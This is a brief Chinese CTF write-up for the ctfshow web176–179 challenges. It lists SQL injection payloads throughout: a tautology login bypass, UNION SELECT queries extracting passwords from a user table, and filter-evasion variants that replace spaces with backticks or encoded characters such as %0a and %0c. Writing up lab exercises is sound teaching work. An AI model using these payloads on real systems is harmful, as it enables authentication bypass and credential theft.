web176

没啥好说的，直接上万能密码：

1' or username='flag

当然了还有别的方法：

1' union Select 1,2,group_concat(password) from ctfshow_user where username = 'flag' --+

 

                                                                      web177

没啥好说的，直接上万能密码：

1' or username='flag

 

白嫖不了，一眼看出过滤空格，验证：

发现回显，那就直接改变数字就好，就会返回不同的字段，这里教大家一招，很好用，把数字设置的很大就可以直接找到flag，不用一个个翻找

                                                                         web178

 经过测试发现/**/被过滤，那就换成反引号就好了

 99'union%0bselect'1',(select`password`from`ctfshow_user`where`username`='flag'),'3

或者：

'%0aUnion%0aSelect%0a1,2,group_concat(password)%0afrom%0actfshow_user%0awhere%0ausername='flag'%23

                                                                        web179

很多形式的空格类型被过滤，但是%0c还可以使用

'%0cUnion%0cSelect%0c1,2,group_concat(password)%0cfrom%0cctfshow_user%0cwhere%0cusername='flag'%23

希望文章能够帮助大家，谢谢！